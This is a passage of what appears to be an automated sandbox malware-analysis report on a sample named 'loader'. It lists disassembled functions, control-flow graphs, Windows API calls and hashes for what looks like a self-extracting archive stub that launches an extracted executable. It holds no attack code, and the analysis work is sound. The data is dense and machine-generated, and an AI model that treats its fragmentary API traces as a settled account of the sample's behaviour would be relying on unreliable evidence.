                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcslen$H_prolog__fprintf_l_wcschr
                                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$R$RTL$STRINGS$a
                                                                                    • API String ID: 1810648836-2415259559
                                                                                    • Opcode ID: 2bd1205c545f0a081dee8f87e9f90cf2489cd517aaa2bd79816e723756b45b41
                                                                                    • Instruction ID: c7a7809f0e67f52574d60497dd6d4e430e4856e86104172ea221da44d4eb94bf
                                                                                    • Opcode Fuzzy Hash: 2bd1205c545f0a081dee8f87e9f90cf2489cd517aaa2bd79816e723756b45b41
                                                                                    • Instruction Fuzzy Hash: E732C171900218EBDF28EF68D842BEE77AAFF14704F40055AF90597291E7B2DD85CBA4
                                                                                    Function 0064D4D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 97windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                      • Part of subcall function 0064B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0064B579
                                                                                      • Part of subcall function 0064B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064B58A
                                                                                      • Part of subcall function 0064B568: IsDialogMessageW.USER32(00010406,?), ref: 0064B59E
                                                                                      • Part of subcall function 0064B568: TranslateMessage.USER32(?), ref: 0064B5AC
                                                                                      • Part of subcall function 0064B568: DispatchMessageW.USER32(?), ref: 0064B5B6
                                                                                    • GetDlgItem.USER32(00000068,0068FCB8), ref: 0064D4E8
                                                                                    • ShowWindow.USER32(00000000,00000005,?,?,?,0064AF07,00000001,?,?,0064B7B9,0066506C,0068FCB8,0068FCB8,00001000,00000000,00000000), ref: 0064D510
                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0064D51B
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,006635F4), ref: 0064D529
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0064D53F
                                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0064D559
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0064D59D
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0064D5AB
                                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0064D5BA
                                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0064D5E1
                                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,006643F4), ref: 0064D5F0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                                    • String ID: \
                                                                                    • API String ID: 3569833718-2967466578
                                                                                    • Opcode ID: aefb5fbe13fdebff8a82c2bf2a4195b2a74b01e6717d755c7b26480d7ab0afcf
                                                                                    • Instruction ID: b54edbadf7ecad1da740ca95cdd75f3c9b5f0fd4f4f35318459fde9c77997c0a
                                                                                    • Opcode Fuzzy Hash: aefb5fbe13fdebff8a82c2bf2a4195b2a74b01e6717d755c7b26480d7ab0afcf
                                                                                    • Instruction Fuzzy Hash: 4531D471145352BFE301DF20DC4AFAB7FAEEB86708F000509F551962A0EB659A04CB7A
                                                                                    Function 0064D78F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 184COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 855 64d78f-64d7a7 call 64ec50 858 64d7ad-64d7b9 call 653e13 855->858 859 64d9e8-64d9f0 855->859 858->859 862 64d7bf-64d7e7 call 64fff0 858->862 865 64d7f1-64d7ff 862->865 866 64d7e9 862->866 867 64d801-64d804 865->867 868 64d812-64d818 865->868 866->865 869 64d808-64d80e 867->869 870 64d85b-64d85e 868->870 872 64d837-64d844 869->872 873 64d810 869->873 870->869 871 64d860-64d866 870->871 874 64d86d-64d86f 871->874 875 64d868-64d86b 871->875 877 64d9c0-64d9c2 872->877 878 64d84a-64d84e 872->878 876 64d822-64d82c 873->876 881 64d882-64d898 call 63b92d 874->881 882 64d871-64d878 874->882 875->874 875->881 883 64d82e 876->883 884 64d81a-64d820 876->884 880 64d9c6 877->880 879 64d854-64d859 878->879 878->880 879->870 888 64d9cf 880->888 891 64d8b1-64d8bc call 63a231 881->891 892 64d89a-64d8a7 call 641fbb 881->892 882->881 885 64d87a 882->885 883->872 884->876 887 64d830-64d833 884->887 885->881 887->872 890 64d9d6-64d9d8 888->890 893 64d9e7 890->893 894 64d9da-64d9dc 890->894 900 64d8be-64d8d5 call 63b6c4 891->900 901 64d8d9-64d8e6 ShellExecuteExW 891->901 892->891 902 64d8a9 892->902 893->859 894->893 898 64d9de-64d9e1 ShowWindow 894->898 898->893 900->901 901->893 904 64d8ec-64d8f9 901->904 902->891 906 64d90c-64d90e 904->906 907 64d8fb-64d902 904->907 909 64d925-64d944 call 64dc3b 906->909 910 64d910-64d919 906->910 907->906 908 64d904-64d90a 907->908 908->906 911 64d97b-64d987 908->911 909->911 921 64d946-64d94e 909->921 910->909 916 64d91b-64d923 ShowWindow 910->916 918 64d998-64d9a6 911->918 919 64d989-64d996 call 641fbb 911->919 916->909 918->890 920 64d9a8-64d9aa 918->920 919->888 919->918 920->890 923 64d9ac-64d9b2 920->923 921->911 924 64d950-64d961 921->924 923->890 926 64d9b4-64d9be 923->926 924->911 928 64d963-64d96d 924->928 926->890 929 64d974 928->929 930 64d96f 928->930 929->911 930->929
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: ShowWindow$ExecuteShell_wcslen
                                                                                    • String ID: .exe$.inf$Install$hd$rd
                                                                                    • API String ID: 855908426-4153170921
                                                                                    • Opcode ID: 27cd10ef76339ffbad92ceeec6748f8e6f89b2ac2fbd085fc258e0a7fb5cb403
                                                                                    • Instruction ID: e4cf7f1cafcd4b9fd253f9ffd5a79391be8ce996ff51956d95c1001398eeb4b9
                                                                                    • Opcode Fuzzy Hash: 27cd10ef76339ffbad92ceeec6748f8e6f89b2ac2fbd085fc258e0a7fb5cb403
                                                                                    • Instruction Fuzzy Hash: 9651A170904380AEDB219F249845BFBBBE7AF82744F04181EF9C5D73A1E7718A85CB52
                                                                                    Function 0064B568 Relevance: 7.5, APIs: 5, Instructions: 38windowCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 931 64b568-64b581 PeekMessageW 932 64b583-64b597 GetMessageW 931->932 933 64b5bc-64b5be 931->933 934 64b5a8-64b5b6 TranslateMessage DispatchMessageW 932->934 935 64b599-64b5a6 IsDialogMessageW 932->935 934->933 935->933 935->934
                                                                                    APIs
                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0064B579
                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0064B58A
                                                                                    • IsDialogMessageW.USER32(00010406,?), ref: 0064B59E
                                                                                    • TranslateMessage.USER32(?), ref: 0064B5AC
                                                                                    • DispatchMessageW.USER32(?), ref: 0064B5B6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$DialogDispatchPeekTranslate
                                                                                    • String ID:
                                                                                    • API String ID: 1266772231-0
                                                                                    • Opcode ID: cc08f88f4295828b36afb2cc00555593f44addf4a4b81c048a9c4b25c68160f4
                                                                                    • Instruction ID: 53a5fc5712cf306f14c791253dd15ad0b6251f220926637b7e19e7b3de904bfa
                                                                                    • Opcode Fuzzy Hash: cc08f88f4295828b36afb2cc00555593f44addf4a4b81c048a9c4b25c68160f4
                                                                                    • Instruction Fuzzy Hash: F3F0D071A0122AAB8B249FE5DC4DDDBBFBDEE053917005416B519D2210EB74D605CBB0
                                                                                    Function 0064ABAB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 936 64abab-64abca GetClassNameW 937 64abf2-64abf4 936->937 938 64abcc-64abe1 call 641fbb 936->938 939 64abf6-64abf9 SHAutoComplete 937->939 940 64abff-64ac01 937->940 943 64abf1 938->943 944 64abe3-64abef FindWindowExW 938->944 939->940 943->937 944->943
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 0064ABC2
                                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0064ABE9
                                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 0064ABF9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: AutoClassCompleteFindNameWindow
                                                                                    • String ID: EDIT
                                                                                    • API String ID: 1162832696-3080729518
                                                                                    • Opcode ID: 882e5e3329efd4aaeb1a32e61e95b92a5501dce59b03f7c2eb843b299596e15b
                                                                                    • Instruction ID: c7164ff454fdd491f5bcf9c6044897fd5326da1335ad5fba1c7ffd2ca28e0b89
                                                                                    • Opcode Fuzzy Hash: 882e5e3329efd4aaeb1a32e61e95b92a5501dce59b03f7c2eb843b299596e15b
                                                                                    • Instruction Fuzzy Hash: D7F0823664122876DB305A649C0AFEB76AE9B46B40F484016BA05E62C0DB60DE4585BA
                                                                                    Function 0064AC16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34comCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    APIs
                                                                                    • OleInitialize.OLE32(00000000), ref: 0064AC2F
                                                                                    • SHGetMalloc.SHELL32(00678438), ref: 0064AC70
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: InitializeMalloc
                                                                                    • String ID: riched20.dll
                                                                                    • API String ID: 48681180-3360196438
                                                                                    • Opcode ID: d06162457e48745bddec1089230f9e8bf27f2013c629d024bda3f4fade9be4da
                                                                                    • Instruction ID: 4d5603d5b599c23a7505a784576e2ff63f777f95c66ae485ab10d3898a0535ab
                                                                                    • Opcode Fuzzy Hash: d06162457e48745bddec1089230f9e8bf27f2013c629d024bda3f4fade9be4da
                                                                                    • Instruction Fuzzy Hash: F8F067B1D00219AFCB10AFAAD9499EFFFFEEF84700F00405AE815E2201CBB456058FA0
                                                                                    Function 0064DBDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 951 64dbde-64dc12 call 64ec50 call 640371 957 64dc14-64dc18 951->957 958 64dc36-64dc38 951->958 959 64dc21-64dc28 call 64048d 957->959 962 64dc1a-64dc20 959->962 963 64dc2a-64dc30 SetEnvironmentVariableW 959->963 962->959 963->958
                                                                                    APIs
                                                                                    • SetEnvironmentVariableW.KERNELBASE(sfxpar,00000000), ref: 0064DC30
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: EnvironmentVariable
                                                                                    • String ID: sfxcmd$sfxpar
                                                                                    • API String ID: 1431749950-3493335439
                                                                                    • Opcode ID: 63f053bf23616df560d7b7c26de1e25c3e1b12f21cdd34b8974c89c747846d59
                                                                                    • Instruction ID: e21d002d665ccba81cd5e05b56583e028d31fc97a0c005664718c343c114de45
                                                                                    • Opcode Fuzzy Hash: 63f053bf23616df560d7b7c26de1e25c3e1b12f21cdd34b8974c89c747846d59
                                                                                    • Instruction Fuzzy Hash: 5BF0E5B2804234ABDB202FD58C46BFABB9FAF06B81B040415FE8696251E6F08940D6B4
                                                                                    Function 0065A95B Relevance: 4.7, APIs: 3, Instructions: 216COMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 964 65a95b-65a974 965 65a976-65a986 call 65ef4c 964->965 966 65a98a-65a98f 964->966 965->966 971 65a988 965->971 968 65a991-65a999 966->968 969 65a99c-65a9c0 966->969 968->969 973 65a9c6-65a9d2 969->973 974 65ab53-65ab66 call 64fbbc 969->974 971->966 976 65a9d4-65a9e5 973->976 977 65aa26 973->977 980 65aa04-65aa15 call 658e06 976->980 981 65a9e7-65a9f6 call 662010 976->981 979 65aa28-65aa2a 977->979 984 65aa30-65aa43 979->984 985 65ab48 979->985 980->985 991 65aa1b 980->991 981->985 990 65a9fc-65aa02 981->990 984->985 995 65aa49-65aa5b call 65af6c 984->995 986 65ab4a-65ab51 call 65abc3 985->986 986->974 994 65aa21-65aa24 990->994 991->994 994->979 997 65aa60-65aa64 995->997 997->985 998 65aa6a-65aa71 997->998 999 65aa73-65aa78 998->999 1000 65aaab-65aab7 998->1000 999->986 1001 65aa7e-65aa80 999->1001 1002 65ab03 1000->1002 1003 65aab9-65aaca 1000->1003 1001->985 1004 65aa86-65aaa0 call 65af6c 1001->1004 1005 65ab05-65ab07 1002->1005 1006 65aae5-65aaf6 call 658e06 1003->1006 1007 65aacc-65aadb call 662010 1003->1007 1004->986 1019 65aaa6 1004->1019 1009 65ab41-65ab47 call 65abc3 1005->1009 1010 65ab09-65ab22 call 65af6c 1005->1010 1006->1009 1018 65aaf8 1006->1018 1007->1009 1021 65aadd-65aae3 1007->1021 1009->985 1010->1009 1024 65ab24-65ab2b 1010->1024 1023 65aafe-65ab01 1018->1023 1019->985 1021->1023 1023->1005 1025 65ab67-65ab6d 1024->1025 1026 65ab2d-65ab2e 1024->1026 1027 65ab2f-65ab3f 1025->1027 1026->1027 1027->1009 1029 65ab6f-65ab76 call 65abc3 1027->1029 1029->986
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: __freea
                                                                                    • String ID:
                                                                                    • API String ID: 240046367-0
                                                                                    • Opcode ID: de5e6ec3d5c47f6fbd50b3c5e380361fb427360405ba927bf1700616b734ad24
                                                                                    • Instruction ID: 0c04ec0de1f59ea57cec8bf5594ccbfb5a74f6404a41512945f2ba1bcf2ebc23
                                                                                    • Opcode Fuzzy Hash: de5e6ec3d5c47f6fbd50b3c5e380361fb427360405ba927bf1700616b734ad24
                                                                                    • Instruction Fuzzy Hash: 5751BF72A10216AFDB258FA4DC42EEBBBABEB44751F154729FC04D7240EB34DC58C692
                                                                                    Function 0064A6C2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 100COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1032 64a6c2-64a6df 1034 64a6e5-64a6f6 1032->1034 1035 64a7db 1032->1035 1034->1035 1038 64a6fc-64a70b 1034->1038 1036 64a7dd-64a7e1 1035->1036 1038->1035 1040 64a711-64a71c 1038->1040 1040->1035 1042 64a722-64a737 1040->1042 1044 64a7d3-64a7d9 1042->1044 1045 64a73d-64a746 1042->1045 1044->1036 1047 64a7cc 1045->1047 1048 64a74c-64a76a call 650320 CreateStreamOnHGlobal 1045->1048 1047->1044 1051 64a7c5 1048->1051 1052 64a76c-64a78e call 64a626 1048->1052 1051->1047 1052->1051 1057 64a790-64a798 1052->1057 1058 64a7b3-64a7c1 1057->1058 1059 64a79a-64a7a7 call 64eb26 1057->1059 1058->1051 1061 64a7ac-64a7ae 1059->1061 1061->1058 1063 64a7b0 1061->1063 1063->1058
                                                                                    APIs
                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0064A762
                                                                                      • Part of subcall function 0064A626: 739A6BB0.GDIPLUS(00000010), ref: 0064A62C
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2187129898.0000000000631000.00000040.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2187098367.0000000000630000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000675000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.0000000000692000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187129898.00000000006A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187328048.00000000006AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.00000000006C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000801000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000806000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2187363389.0000000000821000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_630000_loader.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateGlobalStream
                                                                                    • String ID: PNG
                                                                                    • API String ID: 2244384528-364855578
                                                                                    • Opcode ID: 1237a27d039818d312dbcb38a80f5bff0dc7d01f0b36370eddb9abf3cb29a2d6
                                                                                    • Instruction ID: d6a4fff3416979e535eeea9914fdf9825188d9b004d3ef3831257b387d22516a
                                                                                    • Opcode Fuzzy Hash: 1237a27d039818d312dbcb38a80f5bff0dc7d01f0b36370eddb9abf3cb29a2d6
                                                                                    • Instruction Fuzzy Hash: 61318F79640312BFD7209F61EC88D5BBBBBEF86750B041519F805C2720EB71DD44DAA1
                                                                                    Function 0065BA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
